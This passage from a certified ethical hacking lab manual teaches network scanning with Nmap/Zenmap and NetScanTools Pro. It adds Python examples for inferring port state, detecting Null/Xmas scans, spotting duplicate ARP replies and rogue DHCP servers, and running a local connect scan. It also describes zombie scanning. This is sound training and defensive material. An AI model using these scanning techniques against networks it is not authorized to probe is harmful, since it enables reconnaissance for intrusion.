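NULL_FLAGS = 0                 # what -sN sends (no flags at all)


@dataclass
class Probe:
    src: str
    dst: str
    dport: int
    flags: int


@dataclass
class Reply:
    flags: Optional[int] = None     # TCP flags of the answer; None = silence
    icmp_unreachable: bool = False  # ICMP type 3 (code 1, 2, 3, 9, 10 or 13)


def probe_kind(flags: int) -> str:
    """Name the Nmap technique that emits a segment with exactly these flags."""
    return {NULL_FLAGS: "null", XMAS_FLAGS: "xmas", FIN: "fin",
            ACK: "ack", SYN: "syn"}.get(flags, "other")


def infer_port_state(probe: Probe, reply: Reply) -> str:
    """Port state Nmap reports for one probe/response pair.

    Inverse-flag probes (no SYN/RST/ACK bit set): RFC 793 says a closed
    port answers RST while an open port stays silent, so silence is
    ambiguous and Nmap reports open|filtered.  ACK probes: any port that
    is reachable at all answers RST (unfiltered); silence or an ICMP
    unreachable means a filter dropped the probe.
    """
    kind = probe_kind(probe.flags)
    if reply.icmp_unreachable:
        return "filtered"
    got_rst = reply.flags is not None and bool(reply.flags & RST)
    if kind in ("null", "xmas", "fin"):
        return "closed" if got_rst else "open|filtered"
    if kind == "ack":
        return "unfiltered" if got_rst else "filtered"
    raise ValueError(f"{kind} probes are not modelled in this example")


def detect_inverse_flag_scans(probes: List[Probe], min_ports: int = 3) -> Dict[str, dict]:
    """Defender's view: a conforming TCP stack never originates a segment
    without SYN, RST or ACK, so Null/Xmas/FIN segments are scan probes by
    definition.  Report each source that sent them to at least min_ports
    distinct destination ports."""
    seen: Dict[str, dict] = defaultdict(lambda: {"ports": set(), "kinds": set()})
    for p in probes:
        if p.flags & (SYN | RST | ACK):
            continue  # ordinary handshake, data or teardown traffic
        seen[p.src]["ports"].add(p.dport)
        seen[p.src]["kinds"].add(probe_kind(p.flags))
    return {src: {"ports": sorted(v["ports"]), "kinds": sorted(v["kinds"])}
            for src, v in seen.items() if len(v["ports"]) >= min_ports}


# Constructed sample: 10.0.0.9 Xmas-scans four ports and Null-scans one port
# on 10.0.0.4; 10.0.0.7 performs an ordinary SYN handshake on port 445.
SAMPLE_PROBES = [
    Probe("10.0.0.9", "10.0.0.4", 135, XMAS_FLAGS),
    Probe("10.0.0.9", "10.0.0.4", 139, XMAS_FLAGS),
    Probe("10.0.0.9", "10.0.0.4", 445, XMAS_FLAGS),
    Probe("10.0.0.9", "10.0.0.4", 3389, XMAS_FLAGS),
    Probe("10.0.0.9", "10.0.0.4", 22, NULL_FLAGS),
    Probe("10.0.0.7", "10.0.0.4", 445, SYN),
]

if __name__ == "__main__":
    # A closed port answering RST versus a silent port: the classic ambiguity.
    print(infer_port_state(SAMPLE_PROBES[4], Reply(flags=RST | ACK)))    # closed
    print(infer_port_state(SAMPLE_PROBES[2], Reply()))                   # open|filtered
    print(infer_port_state(Probe("a", "b", 80, ACK), Reply(flags=RST)))  # unfiltered
    print(detect_inverse_flag_scans(SAMPLE_PROBES))
```

The Null scan in Figure 6.27 reporting all 1000 ports closed is the non-RFC-793 behaviour step 27 warns about: a Windows stack answers RST whether the port is open or not, so these scans learn nothing against such a target.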
The option --version-trace (Trace version scan activity) causes Nmap to print out extensive debugging info about what version scanning is doing. It is a subset of what you get with --packet-trace.

TASK 4
ACK Flag Scan
37. To perform an ACK Flag Scan for a target IP address, create a new profile. Click Profile -> New Profile or Command (Ctrl+P).
FIGURE 6.28: The Zenmap main window with the New Profile or Command option (screenshot: the Profile menu open, showing New Profile or Command Ctrl+P and Edit Selected Profile Ctrl+E)

The --script-updatedb option updates the script database found in scripts/script.db, which is used by Nmap to determine the available default scripts and categories. It is necessary to update the database only if you have added or removed NSE scripts from the default scripts directory or if you have changed the categories of any script. This option is generally used by itself: nmap --script-updatedb.

38. On the Profile tab, input ACK Flag Scan in the Profile name text field.
FIGURE 6.29: The Zenmap Profile Editor window with the Profile tab (screenshot: Profile name ACK Flag Scan; the help pane reads "The description is a full description of what the scan does, which may be long.")

39. To select the parameters for an ACK scan, click the Scan tab in the Profile Editor window, select ACK scan (-sA) from the TCP scan: drop-down list, and select None for all the other fields, but leave the Targets: field empty.
The options --min-parallelism <numprobes>; --max-parallelism <numprobes> (Adjust probe parallelization) control the total number of probes that may be outstanding for a host group. They are used for port scanning and host discovery. By default, Nmap calculates an ever-changing ideal parallelism based on network performance.
The options --min-rtt-timeout <time>, --max-rtt-timeout <time>, --initial-rtt-timeout <time> (Adjust probe timeouts): Nmap maintains a running timeout value for determining how long it waits for a probe response before giving up or retransmitting the probe. This is calculated based on the response times of previous probes.

FIGURE 6.30: The Zenmap Profile Editor window with the Scan tab (screenshot: Targets 10.0.0.4; TCP scan: ACK scan (-sA); Non-TCP scans: None; the TCP scan drop-down list open, offering ACK scan (-sA), FIN scan (-sF), Maimon scan (-sM), Null scan (-sN), TCP SYN scan (-sS), TCP connect scan (-sT), Window scan (-sW) and Xmas Tree scan (-sX); the help pane for Enable all advanced/aggressive options reads "Enable OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute).")
40. Now click the Ping tab and check IPProto probes (-PO) to probe the IP address, and then click Save Changes.
FIGURE 6.31: The Zenmap Profile Editor window with the Ping tab (screenshot: Ping options Don't ping before scanning (-Pn), ICMP ping (-PE), ICMP timestamp request (-PP), ICMP netmask request (-PM), ACK ping (-PA), SYN ping (-PS), UDP probes (-PU), IPProto probes (-PO) checked, and SCTP INIT ping probes (-PY); the help pane for ICMP timestamp request reads "Send an ICMP timestamp probe to see if targets are up.")

The option --max-retries <numtries> (Specify the maximum number of port scan probe retransmissions): when Nmap receives no response to a port scan probe, it can mean the port is filtered. Or maybe the probe or response was simply lost on the network.
41. In the Zenmap main window, input the IP address of the target machine (in this lab: 10.0.0.3), select ACK Flag Scan from the Profile: drop-down list, and then click Scan.
The option --host-timeout <time> (Give up on slow target hosts): some hosts simply take a long time to scan. This may be due to poorly performing or unreliable networking hardware or software, packet rate limiting, or a restrictive firewall. The slowest few percent of the scanned hosts can eat up a majority of the scan time.

42. Nmap scans the target IP address provided and displays results on the Nmap Output tab.

The options --scan-delay <time>; --max-scan-delay <time> (Adjust delay between probes): this option causes Nmap to wait at least the given amount of time between each probe it sends to a given host. This is particularly useful in the case of rate limiting.

43. To view more details regarding the hosts, click the Host Details tab.
FIGURE 6.32: The Zenmap main window with the Target and Profile entered (screenshot: Target 10.0.0.4; Profile ACK Flag Scan; Command nmap -sA -PO 10.0.0.4)

FIGURE 6.33: The Zenmap main window with the Nmap Output tab (screenshot; the Nmap Output tab reads as follows)

    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 17:03 India Standard Time
    Nmap scan report for 10.0.0.4
    Host is up (0.0000030s latency).
    All 1000 scanned ports on 10.0.0.4 are unfiltered
    MAC Address: 00:15:5D:00:07:10 (Microsoft)

    Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
The options --min-rate <number>; --max-rate <number> (Directly control the scanning rate): Nmap's dynamic timing does a good job of finding an appropriate speed at which to scan. Sometimes, however, you may happen to know an appropriate scanning rate for a network, or you may have to guarantee that a scan finishes by a certain time.

FIGURE 6.34: The Zenmap main window with the Host Details tab (screenshot: Host Status State up; Open ports, Filtered ports and Closed ports not legible; Scanned ports 1000; Uptime Not available; Last boot Not available; Addresses IPv4 10.0.0.4, IPv6 Not available, MAC 00:15:5D:00:07:10)
Lab Analysis

Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.

Tool/Utility: Nmap

Information Collected/Objectives Achieved:

Types of Scan used:
■ Intense scan
■ Xmas scan
■ Null scan
■ ACK Flag scan

Intense Scan - Nmap Output:
■ ARP Ping Scan - 1 host
■ Parallel DNS resolution of 1 host
■ SYN Stealth Scan
■ Discovered open port on 10.0.0.4
  o 135/tcp, 139/tcp, 445/tcp, ...
■ MAC Address
■ Operating System Details
■ Uptime Guess
■ Network Distance
■ TCP Sequence Prediction
■ IP ID Sequence Generation
■ Service Info
YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions

1. Analyze and evaluate the results by scanning a target network using:
   a. Stealth Scan (Half-open Scan)
   b. nmap -P
2. Perform Inverse TCP Flag Scanning and analyze hosts and services for a target machine in the network.

Internet Connection Required
[ ] Yes
[x] No

Platform Supported
[x] Classroom
[x] iLabs
Scanning a Network Using NetScanTools Pro

NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals.

Lab Scenario

You have already noticed in the previous lab how you can gather information such as ARP ping scan, MAC address, operating system details, IP ID sequence generation, service info, etc. through Intense Scan, Xmas Scan, Null Scan and ACK Flag Scan in Nmap. An attacker can simply scan a target without sending a single packet to the target from their own IP address; instead, they use a zombie host to perform the scan remotely, and if an intrusion detection report is generated, it will display the IP of the zombie host as the attacker. Attackers can easily know how many packets have been sent since the last probe by checking the IP packet fragment identification number (IP ID).

As an expert penetration tester, you should be able to determine whether a TCP port is open by sending a SYN (session establishment) packet to the port. The target machine will respond with a SYN ACK (session request acknowledgement) packet if the port is open and RST (reset) if the port is closed, and you should be prepared to block any such attacks on the network.

In this lab you will learn to scan a network using NetScanTools Pro. You also need to discover the network and gather information about Internet or local LAN network devices, IP addresses, domains, device ports, and many other network specifics.
Lab Objectives

The objective of this lab is to assist in troubleshooting, diagnosing, monitoring, and discovering devices on a network.

In this lab, you need to:
■ Discover IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs
■ Detect local ports
Lab Environment

To perform the lab, you need:
■ NetScanTools Pro located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\NetScanTools Pro
■ You can also download the latest version of NetScanTools Pro from the link http://www.netscantools.com/nstpromain.html
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Administrative privileges to run the NetScanTools Pro tool

Lab Duration

Time: 10 Minutes

Overview of Network Scanning

Network scanning is the process of examining the activity on a network, which can include monitoring data flow as well as monitoring the functioning of network devices. Network scanning serves to promote both the security and performance of a network. Network scanning may also be employed from outside a network in order to identify potential network vulnerabilities.

NetScanTools Pro performs the following for network scanning:
■ Monitoring network device availability
■ Reporting IP addresses, hostnames, domain names, and port scan results

Lab Tasks

Install NetScanTools Pro on your Windows Server 2012.

Follow the wizard-driven installation steps and install NetScanTools Pro.

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 7.1: Windows Server 2012 - Desktop view

2. Click the NetScanTools Pro app to open the NetScanTools Pro window.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

TASK 1
Scanning the Network

Active Discovery and Diagnostic Tools are tools that you can use to locate and test devices connected to your network. Active discovery means that we send packets to the devices in order to obtain responses.
FIGURE 7.2: Windows Server 2012 - Apps (screenshot: the Start screen, showing the NetScanTools Pro Demo tile among the installed apps)

3. If you are using the Demo version of NetScanTools Pro, then click Start the DEMO.

4. The Open or Create a New Results Database - NetScanTools Pro window will appear; enter a new database name in Database Name (enter new name here).

5. Set a default directory for the results database file location, and click Continue.
FIGURE 7.3: Setting a new database name for NetScanTools Pro (screenshot: the Open or Create a New Results Database dialog, with Database Name Test and Results Database Directory C:\Users\Administrator\Documents; the dialog reads "NetScanTools Pro automatically saves results in a database. The database is required. Create a new Results Database, open a previous Results Database, or use this software in Training Mode with a temporary Results Database. A NEW Results Database will be automatically prefixed with 'NstProData-' and will end with '.db3'. No spaces or periods are allowed when entering a new database name.")

6. The NetScanTools Pro main window will appear as shown in the following figure.

The Database Name will be created in the Results Database Directory; it will have NstProData- prefixed and the file extension .db3.

USB Version: start the software by locating nstpro.exe on your USB drive; it is normally in the /nstpro directory.
FIGURE 7.4: Main window of NetScanTools Pro (screenshot: title bar "test - NetScanTools Pro Demo Version Build 8-17-12 based on version 11.19"; the left panel lists Automated Tools, Manual Tools (all), Favorite Tools, Active Discovery Tools, Passive Discovery Tools, DNS Tools, Packet Level Tools, External Tools and Program Info)

7. Select Manual Tools (all) on the left panel and click ARP Ping. A window will appear with information about the ARP Ping Tool.

8. Click OK.
FIGURE 7.5: Selecting the manual tools option (screenshot: the About the ARP Ping Tool dialog, which reads "Use this tool to 'ping' an IPv4 address on your subnet using ARP packets. Use it on your LAN to find the response time of a device to an ARP_REQUEST packet even if the device is hidden and does not respond to regular Ping. ARP Ping requires a target IPv4 address on your LAN. Don't miss this special feature in this tool: identify duplicate IPv4 addresses by 'pinging' a specific IPv4 address. If more than one device (two or more MAC addresses) responds, you are shown the MAC address of each of the devices. Don't forget to right click in the results for a menu with more options. Demo limitations: None.")

9. Select the Send Broadcast ARP, then Unicast ARP radio button, enter the IP address in Target IPv4 Address, and click Send Arp.
IP version 6 addresses have a different format from IPv4 addresses and they can be much longer or far shorter. IPv6 addresses always contain 2 or more colon characters and never contain periods. Example: 2001:4860:b006::69 (ipv6.google.com) or ::1 (internal loopback address).

ARP Ping is a useful tool capable of sending ARP packets to a target IP address, and it can also search for multiple devices sharing the same IP address on your LAN.
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 145
The ARP Ping results list one row per packet sent to 10.0.0.1: index, IP address, MAC address, response time (msec) and type (the first packet Broadcast, the following ones Unicast), with response times of a few milliseconds.
FIGURE 7.6: Result of ARP Ping
10. Click ARP Scan (MAC Scan) in the left panel. A window will appear with information about the ARP Scan tool. Click OK.
Send Broadcast ARP, and then Unicast ARP: this mode first sends an ARP packet to the IPv4 address using the broadcast ARP MAC address. Once it receives a response, it sends subsequent packets to the responding MAC address. The source IP address is your interface IP as defined in the Local IP selection box.
The About the ARP Scan Tool dialog reads: Use this tool to send an ARP Request to every IPv4 address on your LAN. IPv4 connected devices cannot hide from ARP packets and must respond with their IP and MAC address. Uncheck the Resolve IPs box for faster scan completion time. Don't forget to right click in the results for a menu with more options. Demo limitations: None.
ARP Scan (sometimes called a MAC Scan) sends ARP packets to the range of IPv4 addresses specified by the Start and End IP Address entry boxes. The purpose of this tool is to rapidly sweep your subnet for IPv4 connected devices.
FIGURE 7.7: Selecting ARP Scan (MAC Scan) option
11. Enter the range of IPv4 addresses in the Starting IPv4 Address and Ending IPv4 Address text boxes.
12. Click Do Arp Scan.
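To show what an ARP scan actually collects, here is an added Python example that is not part of this lab or of NetScanTools Pro: it decodes raw Ethernet/ARP reply frames, builds the IP-to-MAC table the tool displays, and flags any IPv4 address that answers from more than one MAC address, which is the duplicate-address condition the ARP Ping dialog describes (an address conflict, or a spoofed reply that a defender would want to notice). All frames and MAC addresses are constructed for the example, and the function names are my own; only the 10.0.0.1, 10.0.0.2 and 10.0.0.7 addresses come from the lab.

```python
# Added example, not part of the CEH lab or of NetScanTools Pro: parse raw
# Ethernet/ARP reply frames the way an ARP scan collects them, build the
# IP -> MAC table, and flag IPv4 addresses answered by more than one MAC.
# Every frame below is constructed for the example.
import struct
from collections import defaultdict

ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP_PKT = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ETHERTYPE_IPV4 = 0x0800
ARP_REPLY = 2

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def ip_str(b):
    return ".".join(str(x) for x in b)

def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Construct an Ethernet frame carrying an ARP reply (sample data only)."""
    arp = ARP_PKT.pack(1, ETHERTYPE_IPV4, 6, 4, ARP_REPLY,
                       sender_mac, ip_bytes(sender_ip),
                       target_mac, ip_bytes(target_ip))
    return ETH_HDR.pack(target_mac, sender_mac, ETHERTYPE_ARP) + arp

def parse_arp_reply(frame):
    """Return (sender_ip, sender_mac) for a well-formed ARP reply, else None."""
    if len(frame) < ETH_HDR.size + ARP_PKT.size:
        return None
    _, _, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None                     # not ARP (e.g. ordinary IPv4 traffic)
    htype, ptype, hlen, plen, op, sha, spa, _, _ = ARP_PKT.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, ETHERTYPE_IPV4, 6, 4) or op != ARP_REPLY:
        return None                     # requests and non-Ethernet/IPv4 ARP are ignored
    return ip_str(spa), mac_str(sha)

def arp_table(frames):
    """Map each IPv4 address seen in a reply to the set of MACs that claimed it."""
    table = defaultdict(set)
    for frame in frames:
        parsed = parse_arp_reply(frame)
        if parsed:
            ip, mac = parsed
            table[ip].add(mac)
    return dict(table)

def duplicate_ips(table):
    """Addresses claimed by two or more MACs: an IP conflict or a spoofed reply."""
    return {ip: sorted(macs) for ip, macs in table.items() if len(macs) > 1}

# Constructed sample capture: the scanning host's MAC and three responders.
SCANNER_MAC = bytes.fromhex("0015b0000007")
SAMPLE_FRAMES = [
    build_arp_reply(bytes.fromhex("001122334401"), "10.0.0.1", SCANNER_MAC, "10.0.0.7"),
    build_arp_reply(bytes.fromhex("001122334402"), "10.0.0.2", SCANNER_MAC, "10.0.0.7"),
    # a second device answering for 10.0.0.1: the duplicate the ARP Ping tool warns about
    build_arp_reply(bytes.fromhex("00deadbeef99"), "10.0.0.1", SCANNER_MAC, "10.0.0.7"),
    # an unrelated IPv4 frame that a capture would also contain; it must be skipped
    ETH_HDR.pack(SCANNER_MAC, bytes.fromhex("001122334401"), ETHERTYPE_IPV4) + b"\x45" + b"\x00" * 40,
]

if __name__ == "__main__":
    table = arp_table(SAMPLE_FRAMES)
    for ip, macs in sorted(table.items()):
        print(ip, ", ".join(sorted(macs)))
    print("duplicates:", duplicate_ips(table))
```

The parser only accepts Ethernet/IPv4 ARP replies, so requests and non-ARP frames drop out before they can pollute the table; the same check is what lets a capture-based IDS separate a genuine scan result from noise.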
The Connection-Detection tool listens for incoming connections on TCP or UDP ports. It can also listen for ICMP packets. The sources of the incoming connections are shown in the results list and are logged to a SQLite database.
13. Click DHCP Server Discovery in the left panel. A window will appear with information about the DHCP Server Discovery Tool. Click OK.
DHCP is a method of dynamically assigning IP addresses and other network parameter information to network clients from DHCP servers.
FIGURE 7.9: Selecting DHCP Server Discovery Tool Option
14. Select all the Discover Options check boxes and click Discover DHCP Servers.
The About the DHCP Server Discovery Tool dialog reads: Use this tool to quickly locate DHCP servers (IPv4 only) on your local network. It shows the IP address and other settings being handed out by DHCP servers. This tool can also find unknown or 'rogue' DHCP servers. Don't forget to right click in the results for a menu with more options. Demo limitations: None.
The ARP Scan results list, for each device found in the 10.0.0.0 range, its IPv4 address, MAC address, interface manufacturer, hostname and entry type (dynamic), scanned from the WinPcap interface 10.0.0.7.
FIGURE 7.8: Result of ARP Scan (MAC Scan)
NetScanner is a Ping Scan or Sweep tool. It can optionally attempt to use NetBIOS to gather MAC addresses and Remote Machine Name Tables from Windows targets, translate the responding IP addresses to hostnames, query the target for a subnet mask using ICMP, and use ARP packets to resolve IP address/MAC address associations.
FIGURE 7.10: Result of DHCP Server Discovery
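The DHCP Server Discovery tool works by collecting DHCPOFFER messages and listing what each server hands out; the security-relevant use is spotting an offer from a server nobody authorized. The following added Python example, which is not part of this lab or of NetScanTools Pro, decodes DHCPOFFER datagrams (RFC 2131 fixed header plus TLV options) into the fields the tool reports and flags offers whose server identifier is not on an allowlist. The packets are constructed; the legitimate server 10.0.0.1 offering 10.0.0.7 with mask 255.255.255.0 mirrors the lab result, while 10.0.0.200 is a hypothetical rogue server, and the function names are my own.

```python
# Added example, not part of the CEH lab or of NetScanTools Pro: decode DHCP
# OFFER messages as a DHCP server discovery would receive them and flag any
# offer from a server that is not on the authorized list (a "rogue" DHCP
# server). Packets below are constructed; 10.0.0.200 is a hypothetical rogue.
import struct
import ipaddress

MAGIC_COOKIE = b"\x63\x82\x53\x63"
# op, htype, hlen, hops, xid, secs, flags, ciaddr, yiaddr, siaddr, giaddr, chaddr, sname, file
FIXED = struct.Struct("!BBBBIHH4s4s4s4s16s64s128s")   # 236 bytes (RFC 2131)
BOOTREPLY, DHCPOFFER = 2, 2
OPT_MASK, OPT_ROUTER, OPT_DNS, OPT_LEASE, OPT_MSGTYPE, OPT_SERVER_ID, OPT_END = 1, 3, 6, 51, 53, 54, 255

def packed(ip):
    return ipaddress.IPv4Address(ip).packed

def build_offer(xid, client_mac, offered_ip, server_ip, mask, router, dns, lease):
    """Construct a DHCPOFFER (sample data only)."""
    options = (bytes([OPT_MSGTYPE, 1, DHCPOFFER])
               + bytes([OPT_SERVER_ID, 4]) + packed(server_ip)
               + bytes([OPT_MASK, 4]) + packed(mask)
               + bytes([OPT_ROUTER, 4]) + packed(router)
               + bytes([OPT_DNS, 4]) + packed(dns)
               + bytes([OPT_LEASE, 4]) + struct.pack("!I", lease)
               + bytes([OPT_END]))
    header = FIXED.pack(BOOTREPLY, 1, 6, 0, xid, 0, 0, b"\0" * 4, packed(offered_ip),
                        packed(server_ip), b"\0" * 4, client_mac.ljust(16, b"\0"),
                        b"\0" * 64, b"\0" * 128)
    return header + MAGIC_COOKIE + options

def parse_options(data):
    """Walk the TLV option area; stops at END, skips PAD, tolerates truncation."""
    opts, i = {}, 0
    while i < len(data):
        code = data[i]
        if code == 0:                     # PAD
            i += 1
            continue
        if code == OPT_END or i + 1 >= len(data):
            break
        length = data[i + 1]
        opts[code] = data[i + 2:i + 2 + length]
        i += 2 + length
    return opts

def parse_offer(pkt):
    """Return the fields a discovery tool reports, or None if pkt is not a DHCPOFFER."""
    if len(pkt) < FIXED.size + 4 or pkt[FIXED.size:FIXED.size + 4] != MAGIC_COOKIE:
        return None
    op, _, _, _, xid, _, _, _, yiaddr, _, _, _, _, _ = FIXED.unpack_from(pkt)
    opts = parse_options(pkt[FIXED.size + 4:])
    if op != BOOTREPLY or opts.get(OPT_MSGTYPE) != bytes([DHCPOFFER]):
        return None
    ip = lambda b: str(ipaddress.IPv4Address(b)) if b and len(b) == 4 else None
    return {
        "xid": xid,
        "server_id": ip(opts.get(OPT_SERVER_ID)),
        "offered_ip": ip(yiaddr),
        "subnet_mask": ip(opts.get(OPT_MASK)),
        "router": ip(opts.get(OPT_ROUTER)),
        "dns": ip(opts.get(OPT_DNS)),
        "lease_seconds": struct.unpack("!I", opts[OPT_LEASE])[0] if len(opts.get(OPT_LEASE, b"")) == 4 else None,
    }

def find_rogue_servers(packets, authorized):
    """Offers whose server identifier is not an authorized DHCP server."""
    offers = [o for o in map(parse_offer, packets) if o]
    return [o for o in offers if o["server_id"] not in set(authorized)]

CLIENT_MAC = bytes.fromhex("0015b0000007")          # constructed
SAMPLE_PACKETS = [
    # the legitimate server from the lab: 10.0.0.1 offering 10.0.0.7 /24 for 3 days
    build_offer(0x3903F326, CLIENT_MAC, "10.0.0.7", "10.0.0.1", "255.255.255.0",
                "10.0.0.1", "10.0.0.1", 3 * 24 * 3600),
    # hypothetical rogue server handing out itself as gateway and DNS
    build_offer(0x3903F326, CLIENT_MAC, "10.0.0.50", "10.0.0.200", "255.255.255.0",
                "10.0.0.200", "10.0.0.200", 3600),
    b"\x02\x01\x06\x00" + b"\0" * 20,                # junk datagram, must be ignored
]

if __name__ == "__main__":
    for rogue in find_rogue_servers(SAMPLE_PACKETS, ["10.0.0.1"]):
        print("rogue DHCP server", rogue["server_id"], "offered", rogue["offered_ip"],
              "gateway", rogue["router"], "dns", rogue["dns"])
```

The router and DNS options are reported deliberately: a rogue server that points clients at itself for both is exactly the fraudulent TCP/IP configuration the next lab's scenario warns about, and comparing those values against the expected gateway is a cheap second check.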
15. Click Ping Scanner in the left panel. A window will appear with information about the Ping Scanner tool. Click OK.
Port Scanner is a tool designed to determine which ports on a target computer are active, i.e. being used by services or daemons.
16. Select the Use Default System DNS radio button, and enter the range of IP addresses in the Start IP and End IP boxes.
17. Click Start.
The About the Ping Scanner (aka NetScanner) Tool dialog reads: Use this tool to ping a range or list of IPv4 addresses. This tool shows you which computers are active within the range/list (they have to respond to ping). To locate all devices in your subnet, including those blocking ping, you can also use the ARP Scan tool. You can import a text list of IPv4 addresses to ping. Don't miss this special feature in this tool: use the Do SMB/NBNS scan to get NetBIOS responses from unprotected Windows computers. Don't forget to right click in the results for a menu with more options. Demo limitations: Packet Delay (time between sending each ping) is limited to a lower limit of 50 milliseconds. Packet Delay can be as low as zero (0) ms in the full version. In other words, the full version will be a bit faster.
FIGURE 7.11: Selecting Ping Scanner option
The DHCP Server Discovery result (Figure 7.10) lists the scanning interface 10.0.0.7 (Hyper-V Virtual Ethernet Adapter #2) and, for each responding server, the DHCP server IP, server hostname, offered IP, offered subnet mask and lease time; here the server 10.0.0.1 answered with a 255.255.255.0 subnet mask.
The Ping Scanner results for the range 10.0.0.1 to 10.0.0.50 (Use Default System DNS selected) list each responding target IP with its hostname, the status Echo Reply and the response time: 10.0.0.1, 10.0.0.2, 10.0.0.5 and 10.0.0.7 (WIN-D39MR5HL9E4) answered.
Traceroute is a tool that shows the route your network packets are taking between your computer and a target host. You can determine the upstream internet provider(s) that service a network connected device.
FIGURE 7.12: Result of scanning the IP address range
18. Click Port Scanner in the left panel. A window will appear with information about the Port Scanner tool. Click OK.
The About the Port Scanner Tool dialog reads: NEVER SCAN A COMPUTER YOU DO NOT OWN OR HAVE THE OWNER'S PERMISSION TO SCAN. Use this tool to scan a target for TCP or UDP ports that are listening (open with services listening). Types of scanning supported: Full Connect TCP Scan (see notes below), UDP port unreachable scan, combined TCP full connect and UDP scan, TCP SYN only scan and TCP other scan. Don't miss this special feature in this tool: after a target has been scanned, an analysis window will open in your default web browser. Don't forget to right click in the results for a menu with more options. Notes: settings that strongly affect scan speed: Connect Timeout (use 200 or less on a fast network connection with nearby computers, or 3000 or more on a slow connection); Wait After Connect (how long each port test waits before deciding that the port is not active); Maximum Concurrent Connections (try 0, then try five, and notice the difference). Demo limitations: None.
FIGURE 7.13: Selecting Port Scanner option
19. Enter the IP address in the Target Hostname or IP Address field and select the TCP Ports only radio button.
20. Click Scan Range of Ports.
Whois is a client utility that acts as an interface to a remote whois server database. This database may contain domain, IP address or AS Number registries that you can access given the correct query
The Port Scanner result for target 10.0.0.1 (TCP Ports only, scan of a port range; Connect Timeout and Wait After Connect are given in units where 1000 = 1 second) shows port 80 (http, TCP) as Port Active.
FIGURE 7.14: Result of Port Scanner
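The Full Connect TCP Scan the dialog describes completes the three-way handshake on every probed port, which is why a target's service logs record each probe and why the two timing settings (Connect Timeout and Wait After Connect) dominate scan time. The following added Python example, which is not part of this lab or of NetScanTools Pro, implements that scan type with those two knobs and runs it only against a throwaway listener it starts itself on 127.0.0.1, so it works offline. The listener, its banner text, the port numbers and the function names are all constructed for the example.

```python
# Added example, not part of the CEH lab or of NetScanTools Pro: a full connect
# TCP scan with the two timing knobs the Port Scanner dialog names (connect
# timeout and wait-after-connect for a banner). It scans only a throwaway
# listener started on 127.0.0.1 inside the script, so it runs offline.
import socket
import threading

def start_listener(host="127.0.0.1", banner=b"220 constructed-sample-banner\r\n"):
    """Start a TCP service on an ephemeral port; returns (port, stop_function)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    srv.settimeout(0.1)
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            # a real service logs this accept: a connect scan completes the
            # handshake, which is what makes it easy to see on the target side
            conn.sendall(banner)
            conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop.set

def probe_port(host, port, connect_timeout, wait_after_connect):
    """Full connect probe: None if closed/filtered, else the banner bytes (maybe empty)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(connect_timeout)
    try:
        s.connect((host, port))
    except OSError:                       # refused (closed) or timed out (filtered)
        s.close()
        return None
    s.settimeout(wait_after_connect)
    try:
        return s.recv(256)
    except OSError:                       # open, but silent within the wait window
        return b""
    finally:
        s.close()

def connect_scan(host, ports, connect_timeout=0.5, wait_after_connect=0.5):
    """Map each open port to its banner text (empty string if the service sent none)."""
    results = {}
    for port in ports:
        banner = probe_port(host, port, connect_timeout, wait_after_connect)
        if banner is not None:
            results[port] = banner.decode("ascii", "replace").strip()
    return results

def unused_port(host="127.0.0.1"):
    """Pick a currently unbound port so the scan has a closed port to compare."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port

if __name__ == "__main__":
    open_port, stop = start_listener()
    closed_port = unused_port()
    print(connect_scan("127.0.0.1", [open_port, closed_port]))
    stop()
```

A refused connection returns immediately, so closed ports cost almost nothing; a filtered port burns the whole connect timeout, which is the reason the dialog recommends a short timeout on a fast local network.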
Lab Analysis
Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.
Tool/Utility: NetScanTools Pro
Information Collected/Objectives Achieved:
ARP Scan Results:
■ IPv4 Address
■ MAC Address
■ I/F Manufacturer
■ Hostname
■ Entry Type
■ Local Address
Information for Discovered DHCP Servers:
■ IPv4 Address: 10.0.0.7
■ Interface Description: Hyper-V Virtual Ethernet Adapter #2
■ DHCP Server IP: 10.0.0.1
■ Server Hostname: 10.0.0.1
■ Offered IP: 10.0.0.7
■ Offered Subnet Mask: 255.255.255.0
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Does NetScanTools Pro support proxy servers or firewalls?
Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Drawing Network Diagrams Using LANSurveyor
LANsurveyor discovers a network and produces a comprehensive network diagram that integrates OSI Layer 2 and Layer 3 topology data.
Lab Scenario
